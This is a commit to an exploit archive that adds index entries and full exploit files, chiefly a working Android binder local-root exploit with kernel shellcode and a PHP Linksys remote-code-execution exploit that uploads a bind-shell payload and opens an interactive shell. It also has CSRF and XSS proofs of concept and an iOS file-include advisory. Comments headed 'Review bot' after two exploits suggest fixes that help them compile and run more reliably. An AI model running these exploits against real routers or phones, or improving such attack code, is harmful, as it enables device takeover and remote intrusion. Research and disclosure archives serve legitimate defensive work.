Updated 02_18_2014

Offensive Security 2014-02-18 04:28:00 +00:00
parent 681c155d4f
commit 182f5dc596
31 changed files with 3599 additions and 0 deletions


@ -28161,6 +28161,7 @@ id,file,description,date,author,platform,type,port
31345,platforms/windows/remote/31345.txt,"MicroWorld eScan Server 9.0.742 Directory Traversal Vulnerability",2008-03-06,"Luigi Auriemma",windows,remote,0
31346,platforms/linux/local/31346.c,"Linux 3.4+ Arbitrary write with CONFIG_X86_X32",2014-02-02,saelo,linux,local,0
31347,platforms/linux/local/31347.c,"linux 3.4+ local root (CONFIG_X86_X32=y)",2014-02-02,rebel,linux,local,0
31350,platforms/php/webapps/31350.txt,"CiMe - Citas Médicas - Multiple Vulnerabilities",2014-02-03,vinicius777,php,webapps,80
31351,platforms/php/webapps/31351.txt,"PHP-Nuke 4nChat Module 0.91 'roomid' Parameter SQL Injection Vulnerability",2008-03-06,meloulisi,php,webapps,0
31352,platforms/php/webapps/31352.txt,"ImageVue 1.7 popup.php path Parameter XSS",2008-03-07,ZoRLu,php,webapps,0
31353,platforms/php/webapps/31353.txt,"ImageVue 1.7 dir2.php path Parameter XSS",2008-03-07,ZoRLu,php,webapps,0
@ -28317,6 +28318,7 @@ id,file,description,date,author,platform,type,port
31512,platforms/php/webapps/31512.txt,"Quick Classifieds 1.0 include/adminHead.inc DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
31513,platforms/php/webapps/31513.txt,"Quick Classifieds 1.0 include/usersHead.inc DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
31514,platforms/php/webapps/31514.txt,"Quick Classifieds 1.0 style/default.scheme.inc DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
31515,platforms/php/webapps/31515.txt,"osCommerce 2.3.3.4 (geo_zones.php, zID param) - SQL Injection Vulnerability",2014-02-07,"Ahmed Aboul-Ela",php,webapps,80
31516,platforms/php/webapps/31516.txt,"Serendipity 1.7.5 (Backend) - Multiple Vulnerabilities",2014-02-07,"Stefan Schurtz",php,webapps,80
31517,platforms/php/webapps/31517.txt,"CTERA 3.2.29.0 and 3.2.42.0 - Stored XSS",2014-02-07,"Luigi Vezzoso",php,webapps,80
31518,platforms/linux/remote/31518.rb,"Pandora FMS Remote Code Execution",2014-02-07,metasploit,linux,remote,8023
@ -28324,6 +28326,8 @@ id,file,description,date,author,platform,type,port
31520,platforms/php/webapps/31520.txt,"AuraCMS 2.3 - Multiple Vulnerabilities",2014-02-07,"High-Tech Bridge SA",php,webapps,80
31521,platforms/php/webapps/31521.txt,"doorGets CMS 5.2 - SQL Injection Vulnerability",2014-02-07,"High-Tech Bridge SA",php,webapps,80
31522,platforms/windows/dos/31522.py,"OneHTTPD 0.8 - Crash PoC",2014-02-08,"Mahmod Mahajna (Mahy)",windows,dos,80
31524,platforms/windows/local/31524.rb,"Publish-It 3.6d (.pui) - SEH Buffer Overflow",2014-02-08,"Muhamad Fadzil Ramli",windows,local,0
31525,platforms/php/webapps/31525.txt,"MyBB Extended Useradmininfo Plugin 1.2.1 - Cross Site Scripting",2014-02-09,"Fikri Fadzil",php,webapps,80
31527,platforms/hardware/webapps/31527.nse,"ZTE ZXV10 W300 Router - Hardcoded Credentials",2014-02-09,"Cesar Neira",hardware,webapps,80
31528,platforms/php/webapps/31528.txt,"Le Forum 'Fichier_Acceuil' Parameter Remote File Include Vulnerability",2008-03-24,ZoRLu,php,webapps,0
31529,platforms/php/webapps/31529.txt,"Joomla! and Mambo Cinema Component 1.0 'id' Parameter SQL Injection Vulnerability",2008-03-23,S@BUN,php,webapps,0
@ -28362,7 +28366,9 @@ id,file,description,date,author,platform,type,port
31568,platforms/php/webapps/31568.txt,"PHP Classifieds 6.20 Multiple Cross Site Scripting and Authentication Bypass Vulnerabilities",2008-03-31,ZoRLu,php,webapps,0
31569,platforms/hardware/webapps/31569.txt,"D-Link DSL-2750B ADSL Router - CSRF Vulnerability",2014-02-11,killall-9,hardware,webapps,80
31570,platforms/php/webapps/31570.txt,"Wordpress Frontend Upload Plugin - Arbitrary File Upload",2014-02-11,"Daniel Godoy",php,webapps,80
31571,platforms/php/webapps/31571.txt,"Wordpress Buddypress Plugin 1.9.1 - Privilege Escalation",2014-02-11,"Pietro Oliva",php,webapps,80
31573,platforms/hardware/webapps/31573.txt,"WiFi Camera Roll 1.2 iOS - Multiple Vulnerabilities",2014-02-11,Vulnerability-Lab,hardware,webapps,8880
31574,platforms/arm/local/31574.c,"Linux ARM - Local Root Exploit",2014-02-11,"Piotr Szerman",arm,local,0
31575,platforms/windows/remote/31575.rb,"KingScada kxClientDownload.ocx ActiveX Remote Code Execution",2014-02-11,metasploit,windows,remote,0
31576,platforms/windows/local/31576.rb,"Windows TrackPopupMenuEx Win32k NULL Page",2014-02-11,metasploit,windows,local,0
31577,platforms/unix/remote/31577.rb,"Kloxo SQL Injection and Remote Code Execution",2014-02-11,metasploit,unix,remote,7778
@ -28461,3 +28467,27 @@ id,file,description,date,author,platform,type,port
31679,platforms/php/webapps/31679.txt,"PortailPHP 2.0 'mod_search' Remote File Include Vulnerability",2008-04-21,ZoRLu,php,webapps,0
31681,platforms/php/webapps/31681.py,"XOOPS 2.0.14 Article Module 'article.php' SQL Injection Vulnerability",2008-04-21,Cr@zy_King,php,webapps,0
31682,platforms/php/webapps/31682.txt,"S9Y Serendipity 1.3 Referer HTTP Header XSS",2008-04-22,"Hanno Boeck",php,webapps,0
31683,platforms/hardware/remote/31683.php,"Linksys E-series Unauthenticated Remote Code Execution Exploit",2014-02-16,Rew,hardware,remote,0
31686,platforms/multiple/webapps/31686.py,"Dexter (CasinoLoader) Panel - SQL Injection",2014-02-16,bwall,multiple,webapps,80
31688,platforms/windows/local/31688.pl,"ImageMagick 6.8.8-4 - Local Buffer Overflow (SEH)",2014-02-16,"Mike Czumak",windows,local,0
31689,platforms/windows/remote/31689.py,"HP Data Protector EXEC_BAR Remote Command Execution",2014-02-16,"Chris Graham",windows,remote,5555
31690,platforms/hardware/webapps/31690.txt,"Trendchip HG520 ADSL2+ Wireless Modem CSRF Vulnerability",2014-02-16,"Dhruv Shah",hardware,webapps,80
31691,platforms/hardware/webapps/31691.txt,"Office Assistant Pro 2.2.2 iOS - File Include Vulnerability",2014-02-16,Vulnerability-Lab,hardware,webapps,8080
31692,platforms/hardware/webapps/31692.txt,"mbDriveHD 1.0.7 iOS - Multiple Vulnerabilities",2014-02-16,Vulnerability-Lab,hardware,webapps,8080
31693,platforms/hardware/webapps/31693.txt,"File Hub 1.9.1 iOS - Multiple Vulnerabilities",2014-02-16,Vulnerability-Lab,hardware,webapps,8080
31695,platforms/php/remote/31695.rb,"Dexter (CasinoLoader) SQL Injection",2014-02-16,metasploit,php,remote,0
31697,platforms/php/webapps/31697.txt,"Horde Webmail 1.0.6 'addevent.php' Cross-Site Scripting Vulnerability",2008-04-23,"Aria-Security Team",php,webapps,0
31698,platforms/hardware/remote/31698.txt,"F5 Networks FirePass 4100 SSL VPN 'installControl.php3' Cross-Site Scripting Vulnerability",2008-04-23,"Alberto Cuesta Partida",hardware,remote,0
31699,platforms/windows/remote/31699.txt,"RSA Authentication Agent for Web 5.3 URI Redirection Vulnerability",2008-04-23,"Richard Brain",windows,remote,0
31700,platforms/php/webapps/31700.txt,"e107 CMS 0.7 Multiple Cross-Site Scripting Vulnerabilities",2008-04-24,ZoRLu,php,webapps,0
31701,platforms/php/webapps/31701.txt,"Digital Hive 2.0 'base.php' Parameter Cross-Site Scripting Vulnerability",2008-04-24,ZoRLu,php,webapps,0
31702,platforms/php/webapps/31702.txt,"PHP-Nuke DownloadsPlus Module Arbitrary File Upload Vulnerability",2008-04-24,ZoRLu,php,webapps,0
31703,platforms/php/webapps/31703.txt,"Pixel Motion Blog 'list_article.php' Cross-Site Scripting Vulnerability",2008-04-24,ZoRLu,php,webapps,0
31704,platforms/php/webapps/31704.txt,"PHCDownload 1.1 admin/index.php hash Parameter SQL Injection",2008-04-24,ZoRLu,php,webapps,0
31705,platforms/php/webapps/31705.txt,"PHCDownload 1.1 upload/install/index.php step Parameter XSS",2008-04-24,ZoRLu,php,webapps,0
31706,platforms/unix/remote/31706.txt,"IBM Lotus Expeditor 6.1 URI Handler Command Execution Vulnerability",2008-04-24,"Thomas Pollet",unix,remote,0
31708,platforms/php/webapps/31708.txt,"Joomla Visites 1.1 Component mosConfig_absolute_path Remote File Include Vulnerability",2008-04-26,NoGe,php,webapps,0
31709,platforms/php/webapps/31709.txt,"Siteman 2.0.x2 'module' Parameter Cross-Site Scripting and Local File Include Vulnerability",2008-04-26,IRCRASH,php,webapps,0
31711,platforms/windows/dos/31711.html,"Microsoft Excel 2007 JavaScript Code Remote Denial Of Service Vulnerability",2008-04-26,"Juan Pablo Lopez Yacubian",windows,dos,0
31712,platforms/php/webapps/31712.txt,"miniBB 2.2 'bb_admin.php' Cross-Site Scripting Vulnerability",2008-04-28,IRCRASH,php,webapps,0
31713,platforms/linux/dos/31713.py,"PeerCast 0.1218 'getAuthUserPass' Multiple Buffer Overflow Vulnerabilities",2008-04-29,"Nico Golde",linux,dos,0


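--- a/platforms/arm/local/31574.c
+++ b/platforms/arm/local/31574.c
@@ -0,0 +1,150 @@
+/*
+* Just a lame binder local root exploit stub. Somewhat messy but whatever. The bug was reported in CVE-2013-6282.
+*
+* Tested on Android 4.2.2 and 4.4. Kernels 3.0.57, 3.4.5 and few more. All up to 3.4.5 unpatched should be vulnerable.
+* You need to customize the addresses so that they match the target board. On Android, both /proc/kallsyms and dmesg are
+* restricted, thus no automation here.
+*
+* Rigged up by Piotr Szerman. (c) 2013
+*
+*/
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sys/stat.h>
+#include <sys/types.h>
+#include <sys/mman.h>
+#include <fcntl.h>
+#include <unistd.h>
+#include <errno.h>
+/* Binder transaction request format */
+struct binder_write_read {
+signed long write_size; /* bytes to write */
+signed long write_consumed; /* bytes consumed by driver */
+unsigned long write_buffer;
+signed long read_size; /* bytes to read */
+signed long read_consumed; /* bytes consumed by driver */
+unsigned long read_buffer;
+} bwr;
+#define BR_NOOP 0x0000720c /* binder memory write value */
+#define SC_TABLE 0xc000ee28 /* system call table address */
+/* we need to know the lower halfword of the original address of sys_ni_syscall to tailor MMAP_AREA and MMAP_OFF accordingly.
+* you can aid yourself with a NOP block. the higher halfword will in any case become 0x720c. on one of my boxes, the other
+* halfword was 0xdac4. MMAP_AREA must be aligned appropriately. you can extract all the data in question at runtime from
+* /proc/kallsyms and dmesg (not that hard to set off infoleaks with this bug) as long as there are no contraints in place
+*/
+#define MMAP_AREA 0x720cd000 /* userspace landing point page-aligned address. */
+#define MMAP_OFF 0xac4 /* offset within it to plant the payload */
+#define NUM_PAGES 16
+#define PAGE_SIZE 4096
+#define NOP 0xe1a00000 /* mov r0, r0 */
+#define SHELL "/system/bin/sh"
+#define TARGET_APERTURE 68 /* aiming for two adjacent non-implemented syscalls. check arch/arm/kernel/calls.S */
+#define BINDER_WRITE_READ 0xc0186201 /* printk your BINDER_WRITE_READ ;) */
+/* the target payload */
+void __attribute__((regparm(3))) shellcode(void)
+{
+asm volatile(
+"__transgressor:;"
+"push {r0-r12,lr}" "\n\t"
+"mov r1, sp" "\n\t" /* calculate the process descriptor location */
+"bic r2, r1, #8128" "\n\t"
+"bic r2, r2, #63" "\n\t"
+"ldr r3, [r2, #12]" "\n\t"
+"movt r0, #0" "\n\t"
+"movw r0, #0" "\n\t"
+"ldr r1, [r3, #492]" "\n\t" /* cred's location may differ depending on the kernel config.
+* just build and objdump a kernel module with printk(current->cred->uid)
+* to find out. or pinpoint it with the help of kgdb or whatever ;)
+*/
+"mov r4, #8" "\n\t"
+"__loop_cred:;"
+"sub r4, r4, #1" "\n\t"
+"str r0, [r1, #4]!" "\n\t"
+"teq r4, #0" "\n\t"
+"bne __loop_cred" "\n\t"
+"ldr r1, [r3, #488]" "\n\t" /* real_cred. overkill? */
+"mov r4, #8" "\n\t"
+"__loop_real_cred:;"
+"sub r4, r4, #1" "\n\t"
+"str r0, [r1, #4]!" "\n\t"
+"teq r4, #0" "\n\t"
+"bne __loop_real_cred" "\n\t"
+"ldm sp!, {r0-r12,pc}" "\n\t" /* return to ret_fast_syscall */
+"mov pc, lr" "\n\t"
+);
+}
+int
+main(int ac, char **av)
+{
+char * const shell[] = { SHELL, NULL };
+char *map;
+int fd;
+fprintf(stderr, "[!] binder local root exploit\n[!] (c) piotr szerman\n");
+fd = open("/dev/binder", O_RDWR);
+if(fd < 0)
+{
+fprintf(stderr, "[-] failed to reach out for binder. (%s)\n", strerror(errno));
+exit(EXIT_FAILURE);
+}
+map = mmap((void *)MMAP_AREA, NUM_PAGES * PAGE_SIZE, PROT_READ | PROT_WRITE | PROT_EXEC,
+MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED | MAP_LOCKED, 0, 0);
+if(map == (void *)-1)
+{
+perror("mmap() ");
+exit(EXIT_FAILURE);
+}
+fprintf(stderr, "[+] userspace map area == 0x%08lx\n", (unsigned long)map);
+fprintf(stderr, "[+] placing NOP block at 0x%08lx\n", (unsigned long)map);
+memset(map, NOP, MMAP_OFF);
+fprintf(stderr, "[+] copying payload to 0x%08lx\n", (unsigned long)map + MMAP_OFF);
+/* look at the objdump of shellcode to see the correct offset */
+memcpy(map + MMAP_OFF, (unsigned char *)shellcode + 8 /* offseting to the __transgressor */, 30 * sizeof(void *) /* copy all opcodes */);
+fprintf(stderr, "[+] constructing rogue data structure.\n");
+bwr.write_size = 0;
+bwr.write_consumed = 0;
+bwr.read_size = 1;
+bwr.read_consumed = 0;
+/* targeting the aperture between 2 undefined system calls in the table */
+bwr.read_buffer = (unsigned long)((unsigned char *)SC_TABLE + TARGET_APERTURE * sizeof(void *) + 2);
+/* calculate process descriptor address with the aid of sp:
+* task_struct = *( ((unsigned long *) ( (sp & ~(0xbf000000 - 1)) & ~0x3f )) + 3);
+*/
+ioctl(fd, BINDER_WRITE_READ, &bwr);
+close(fd);
+sleep(5); /* give binder ample time to service the transaction. if it's under heavy load, the exploit might fail */
+fprintf(stderr, "[+] r00ting device...\n\n");
+asm volatile(
+"mov r7, %0\n\t"
+"swi 0\n\t"
+: : "I" (TARGET_APERTURE)
+);
+execve(shell[0], shell, NULL);
+return EXIT_FAILURE;
+}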
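Review bot: `ioctl()` is called in `main` without a declaration: the include list at the top of the file stops at `<errno.h>` and never pulls in `<sys/ioctl.h>`, so the call compiles only through an implicit declaration, which current toolchains reject by default. Add `#include <sys/ioctl.h>` next to the other system headers. The mmap failure test compares against `(void *)-1`; the portable spelling is `if(map == MAP_FAILED)`, which `<sys/mman.h>` already defines. `ac` and `av` are never read, so `int main(void)` would state that explicitly.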


@ -0,0 +1,199 @@
#!/usr/bin/php
<?php
/*
Exploit for 0day linksys unauthenticated remote code execution
vulnerability. As exploited by TheMoon worm; Discovered in
the wild on Feb 13, 2013 by Johannes Ullrich.
I was hoping this would stay under-wraps until a firmware
patch could be released, but it appears the cat is out of the bag...
http://www.reddit.com/r/netsec/comments/1xy9k6/that_new_linksys_worm/
Since it's now public, here's my take on it.
Exploit written by Rew.
(Yes I know, everyone hates PHP. Deal with it :P )
Currently only working over the LAN. I think there may be an
iptables issue or something. Left as an exercise to the reader.
Based on "strings" output on TheMoon worm binary, the
following devices may be vulnerable. This list may not be
accurate and/or complete!!!
E4200
E3200
E3000
E2500
E2100L
E2000
E1550
E1500
E1200
E1000
E900
E300
WAG320N
WAP300N
WAP610N
WES610N
WET610N
WRT610N
WRT600N
WRT400N
WRT320N
WRT160N
WRT150N
*/
error_reporting(0);
$host = "192.168.1.1"; // target host
$port = "8080"; // target port
$vuln = "tmUnblock.cgi"; // hndUnblock.cgi works too
// msfpayload linux/mipsle/shell_bind_tcp LPORT=4444 X
$shellcode = base64_decode(
"f0VMRgEBAQAAAAAAAAAAAAIACAABAAAAVABAADQAAAAAAAAAAA".
"AAADQAIAABAAAAAAAAAAEAAAAAAAAAAABAAAAAQAB7AQAAogIA".
"AAcAAAAAEAAA4P+9J/3/DiQnIMABJyjAAf//BihXEAIkDAEBAV".
"BzDyT//1Aw7/8OJCdwwAERXA0kBGjNAf/9DiQncMABJWiuAeD/".
"ra/k/6Cv6P+gr+z/oK8lIBAC7/8OJCcwwAHg/6UjSRACJAwBAQ".
"FQcw8kJSAQAgEBBSROEAIkDAEBAVBzDyQlIBAC//8FKP//BihI".
"EAIkDAEBAVBzDyT//1AwJSAQAv3/DyQnKOAB3w8CJAwBAQFQcw".
"8kJSAQAgEBBSjfDwIkDAEBAVBzDyQlIBAC//8FKN8PAiQMAQEB".
"UHMPJFBzBiT//9AEUHMPJP//BijH/w8kJ3jgASEg7wPw/6Sv9P".
"+gr/f/DiQncMABIWDvAyFojgH//6Ct8P+lI6sPAiQMAQEBL2Jp".
"bi9zaA=="
);
// regular urlencode() doesn't do enough.
// it will break the exploit. so we use this
function full_urlencode($string) {
$ret = "";
for($c=0; $c<strlen($string); $c++) {
if($string[$c] != '&')
$ret .= "%".dechex(ord($string[$c]));
else
$ret .= "&";
}
return $ret;
}
// wget is kind of a bad solution, because it requires
// the payload be accessable via port 80 on the attacker's
// machine. a better solution is to manually write the
// executable payload onto the filesystem with echo -en
// unfortunatly the httpd will crash with long strings,
// so we do it in stages.
function build_payload($host, $port, $vuln, $shellcode) {
// in case we previously had a failed attempt
// meh, it can happen
echo "\tCleaning up... ";
$cleanup = build_packet($host, $port, $vuln, "rm /tmp/c0d3z");
if(!send_packet($host, $port, $cleanup)) die("fail\n");
else echo "done!\n";
// write the payload in 20byte stages
for($i=0; $i<strlen($shellcode); $i+=20) {
echo "\tSending ".$i."/".strlen($shellcode)." bytes... ";
$cmd = "echo -en '";
for($c=$i; $c<$i+20 && $c<strlen($shellcode); $c++) {
$cmd .= "\\0".decoct(ord($shellcode[$c]));
}
$cmd .= "' >> /tmp/c0d3z";
$cmd = build_packet($host, $port, $vuln, $cmd);
if(!send_packet($host, $port, $cmd)) die("fail\n");
else echo "sent!\n";
usleep(100000);
}
// make it usable
echo "\tConfiguring... ";
$config = build_packet($host, $port, $vuln, "chmod a+rwx /tmp/c0d3z");
if(!send_packet($host, $port, $config)) die("fail\n");
else echo "done!\n";
}
// add in all the HTTP shit
function build_packet($host, $port, $vuln, $payload) {
$exploit = full_urlencode(
"submit_button=&".
"change_action=&".
"submit_type=&".
"action=&".
"commit=0&".
"ttcp_num=2&".
"ttcp_size=2&".
"ttcp_ip=-h `".$payload."`&".
"StartEPI=1"
);
$packet =
"POST /".$vuln." HTTP/1.1\r\n".
"Host: ".$host."\r\n".
// this username:password is never checked ;)
"Authorization: Basic ".base64_encode("admin:ThisCanBeAnything")."\r\n".
"Content-Type: application/x-www-form-urlencoded\r\n".
"Content-Length: ".strlen($exploit)."\r\n".
"\r\n".
$exploit;
return $packet;
}
function send_packet($host, $port, $packet) {
$socket = fsockopen($host, $port, $errno, $errstr);
if(!$socket) return false;
if(!fwrite($socket, $packet)) return false;
fclose($socket);
return true;
}
echo "Testing connection to target... ";
$socket = fsockopen($host, $port, $errno, $errstr, 30);
if(!$socket) die("fail\n");
else echo "connected!\n";
fclose($socket);
echo "Sending payload... \n";
build_payload($host, $port, $vuln, $shellcode);
sleep(3); // don't rush him
echo "Executing payload... ";
if(!send_packet($host, $port, build_packet($host, $port, $vuln, "/tmp/c0d3z"))) die("fail\n");
else echo "done!\n";
sleep(3); // don't rush him
echo "Attempting to get a shell... ";
$socket = fsockopen($host, 4444, $errno, $errstr, 30);
if(!$socket) die("fail\n");
else echo "connected!\n";
echo "Opening shell... \n";
while(!feof($socket)) {
$cmd = readline($host."$ ");
if(!empty($cmd)) readline_add_history($cmd);
// there has got to be a better way to detect that we have
// reached the end of the output than this, but whatever
// it's late... i'm tired... and it works...
fwrite($socket, $cmd.";echo xxxEOFxxx\n");
$data = "";
do {
$data .= fread($socket, 1);
} while(strpos($data, "xxxEOFxxx") === false && !feof($socket));
echo str_replace("xxxEOFxxx", "", $data);
}
?>
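Review bot: `send_packet` leaks the socket when the write fails: after `fsockopen` succeeds, the early `return false` on the `fwrite` check skips `fclose`, so every failed stage leaves a handle open until script exit. Close it on that path, `if(!fwrite($socket, $packet)) { fclose($socket); return false; }`. The same `fsockopen` call omits the timeout argument that the connectivity test further down passes as 30, so the two connect paths behave differently; passing the same value keeps them consistent. With `error_reporting(0)` set at the top, the `$errstr` that `fsockopen` fills is never surfaced, which leaves the bare `fail` messages without a cause.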


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28902/info
F5 Networks FirePass 4100 SSL VPN devices are prone to a cross-site scripting vulnerability because they fail to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker to steal cookie-based authentication credentials and to launch other attacks.
FirePass 4100 SSL VPN Firmware 5.4.2-5.5.2 and 6.0-6.2 are vulnerable.
http://www.example.com/installControl.php3?1&%22%3E%3C/script%3E%3Ctextarea%3EHtml%20injection%3C/textarea%3E%3C!--= http://www.example.com/installControl.php3?>'"><script>alert(514)</script>


@ -0,0 +1,66 @@
########################################################################
# Exploit Title: Trendchip HG520 ADSL2+ Wireless Modem CSRF Vulnerability
# Google Dork: N/A
# Date: 15/02/2014
# Exploit Author: Dhruv Shah
# Vendor Homepage: N/A
# Software Link : N/A
# Version: Firmware Version:2.11.38.0(RE0.C2B)3.9.9.5
# Tested on: Embedded Allegro RomPager webserver 4.07 UPnP/1.0 (ZyXEL
ZyWALL 2)
# Type of Application : Modem Web Application
# CVE : N/A
########################################################################
Cross Site Request Forgery
This Modem's Web Application , suffers from Cross-site request forgery
through which attacker can manipulate user data via sending him malicious
craft url.
The Modems's Application not using any security token to prevent it
against CSRF. You can manipulate any userdata. PoC and Exploit to change
user password:
In the POC the IP address in the POST is the modems IP address.
<html>
<body onload="javascript:document.forms[0].submit()">
<form method="POST" action="http://192.168.2.1/Forms/tools_admin_1"
name="tool_admin">
<input name="uiViewTools_Password" size="30" maxlength="30" value="admin"
type="PASSWORD">
<input name="uiViewTools_PasswordConfirm" size="30" maxlength="30"
value="admin" type="PASSWORD">
</form>
</body>
</html>
______________________
*Dhruv Shah* *aka Snypter*
http://security-geek.in/blog/
Blogger | Researcher | Consultant | Writer
Youtube <http://www.youtube.com/snypter> |
Facebook<http://www.facebook.com/dhruvshahs>|
Linkedin <http://in.linkedin.com/pub/dhruv-shah/26/4a6/aa0> |
Twitter<https://twitter.com/Snypter>|
Blog <http://security-geek.in/blog/>


@ -0,0 +1,207 @@
Document Title:
===============
Office Assistant Pro v2.2.2 iOS - File Include Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1197
Release Date:
=============
2014-02-13
Vulnerability Laboratory ID (VL-ID):
====================================
1197
Common Vulnerability Scoring System:
====================================
6.9
Product & Service Introduction:
===============================
Office Assistant Pro is an All-Powerful office suite specially designed for you to deal with the Office affairs anywhere,
anytime on iPhone, iPad or iPod touch. With Office Assistant Pro, you can high-efficiently manage almost all type of
files by `ONE PAGE` model and make Notes, Reminders, Meeting Recorder as below. The powerful file manager: high-efficiently
File Management in only “ONE PAGE” and easily File Transferred between local and cloud storage. You can complete all of
your operations in `ONE PAGE`.
( Copy of the Homepage: https://itunes.apple.com/us/app/office-assistant-pro-full/id449595696 )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a local file include web vulnerability in the official Beijing Elinasoft
Technologies - Office Assistant Pro v2.2.2 iOS mobile web-application.
Vulnerability Disclosure Timeline:
==================================
2014-02-13: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Beijing Elinasoft Technologies
Product: Office Assistant Pro - iOS Mobile Web Application 2.2.2
Exploitation Technique:
=======================
Local
Severity Level:
===============
High
Technical Details & Description:
================================
A local file include web vulnerability has been discovered in the official Beijing Elinasoft Office Assistant Pro v2.2.2 iOS mobile web-application.
The local file include web vulnerability allows remote attackers to unauthorized include local file/path requests or system specific path commands
to compromise the web-application or mobile device.
The web vulnerability is located in the `file name` value of the `Upload` module POST method request. Remote attackers are able to inject own files
with malicious filename to compromise the mobile application. The attack vector is persistent and the request method is POST. The local file/path
include execution occcurs in the main file dir index- or sub category item listing of the file manager. The security risk of the local file include
web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.8(+)|(-)6.9.
Exploitation of the local file include web vulnerability requires no user interaction or privileged mobile web-application user account with password.
Successful exploitation of the local web vulnerability results in mobile application or connected device component compromise by unauthorized local
file include web attacks.
Request Method(s):
[+] [POST]
Vulnerable Input(s):
[+] Upload
Vulnerable Parameter(s):
[+] filename
Affected Module(s):
[+] Index File Dir Item Listing
Proof of Concept (PoC):
=======================
The local file include web vulnerability can be exploited by remote attackers without user interaction or privileged mobile application user account.
For security demonstration or to reproduce the local file include web vulnerability follow the provided information and steps below.
Manually exploitation steps to reproduce the vulnerability ...
1. Install the Beijing Elinasoft Office Assistant Pro v2.2.2 iOS mobile web-application
2. Now visit from a remot ecomputer the wifi web-interface of the service
3. Click the upload button and tamper the next request (POST method)
4. Exchange the filename value with your own malicious local file or path request
5. Continue after the intercept and refresh the index file dir
6. The malicious local file request execution occurs in the main file dir index listing
7. Successful reproduce of the vulnerability!
PoC: Index File Dir Item Listing - Upload > [filename]
<tbody><tr><td>Name</td><td width="20px"> </td><td>Last modified</td><td width="20px"> </td>
<td style="text-align:right">Size</td></tr><tr><td colspan="5"><hr></td></tr><tr><td><a href="http://192.168.2.109:8080/User%20Manual/">User Manual/</a></td>
<td> </td><td style="font-size:9pt;">12.02.2014 01:43</td><td> </td><td style="text-align:right; font-size:9pt;">--</td></tr><tr><td colspan="5"><hr></td></tr>
<tr><td><a href="http://localhost:8080/%3%2F./[LOCAL FILE INCLUDE VULNERABILITY!]'<"><%2F./[LOCAL FILE INCLUDE VULNERABILITY!]'<"></a></td><td>
</td><td style="font-size:9pt;">12.02.2014
01:44</td><td> </td><td
style="text-align:right; font-size:9pt;"> 23.8
Kb</td></tr></table></p><form action=""
method="post" enctype="multipart/form-data" name="form1"
id="form1"><input type="file" name="file" id="file"
/></label><label><input type="submit" name="button"
id="button" value="Upload"
/></label></form><p> </p><hr
/><font size="2" style="color:gray">© 2014 Elinasoft
Technologies Ltd. All Rights Reserved.</font><br><font
size="2"><a
href="http://www.x.com">http://www.x.com</a></font><br><font size="2"><a
href="http://x.com/elinasoft">http://x.com/elinasoft</a></font><br><font size="2"><a
href="http://x.com/elinasoft">http://x.com/elinasoft</a></font></body></html></iframe></a></td></tr></tbody>
--- PoC Session Logs [POST] ---
Status: 200[OK]
POST http://localhost:8080/ Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[1739] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://192.168.2.109:8080/]
Cookie[jtable%2376270709page-size=10]
Connection[keep-alive]
POST-Daten:
POST_DATA[-----------------------------60102527228942
Content-Disposition: form-data; name="file"; filename="%2F./[LOCAL FILE INCLUDE VULNERABILITY!]'<"
Content-Type: image/jpeg
Reference(s): URL
http://localhost:8080/
Solution - Fix & Patch:
=======================
The local web vulnerability can be patched by a secure parse and input restriction of the vulnerable filename value.
Ensure that the POST method request of the upload function is secure to prevent file include and persistent script code injection attacks.
Security Risk:
==============
The security risk of the local file include web vulnerability is estimated as high(+).
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright © 2014 | Vulnerability Laboratory [Evolution Security]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com


@ -0,0 +1,247 @@
Document Title:
===============
mbDriveHD v1.0.7 iOS - Multiple Web Vulnerabilities
References (Source):
====================
